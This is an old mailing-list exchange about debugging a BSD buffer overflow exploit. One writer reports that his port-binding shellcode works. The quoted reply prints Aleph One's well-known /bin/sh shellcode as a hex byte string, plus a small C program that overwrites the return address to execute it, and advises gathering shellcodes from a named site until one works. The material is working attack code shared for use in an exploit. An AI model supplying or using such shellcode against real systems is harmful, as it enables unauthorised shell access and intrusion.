Re: sample buffer overflow exploit problem

[Ganbold <ganbold () micom mng net>]

Deepcode,

I tested my shellcode by function pointer(tested in Aleph1's code) and it 
works fine without any problem. I can connect to it using telnet.
Since shell is bind to port I can issue commands.

If you have time, can you try my codes on your machine?

Ganbold


At 07:45 PM 9/29/2003 -0300, you wrote:

> Indeed, if you believe that the shellcode has the problem, try just 
> testing the shellcode by a funtion pointer: I ripped this code from Aleph 
> Ones smashing the stack.
>
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> void main() {
>   int *ret;
>
>   ret = (int *)&ret + 2;
>   (*ret) = (int)shellcode;
>
> }
>
> replace the shellcode and try it out. If it still doesn't work, then grab 
> some new bsd shellcodes. A good site (if it still exists) is 
> http://www.shellcode.com.ar/
>
> They have some good shellcodes. Try grabbing as many as you can and 
> checking until u get one that works. If it still doesn't work, then a 
> closer inspection of the code would be in order, I can't quite test 
> myself, BSD doesn't like my hard drive, but I will try this code of yours 
> on debian soon.
>
> deepcode
>
> _________________________________________________________________
> Add photos to your e-mail with MSN 8. Get 2 months FREE*.
> http://join.msn.com/?page=features/featuredemail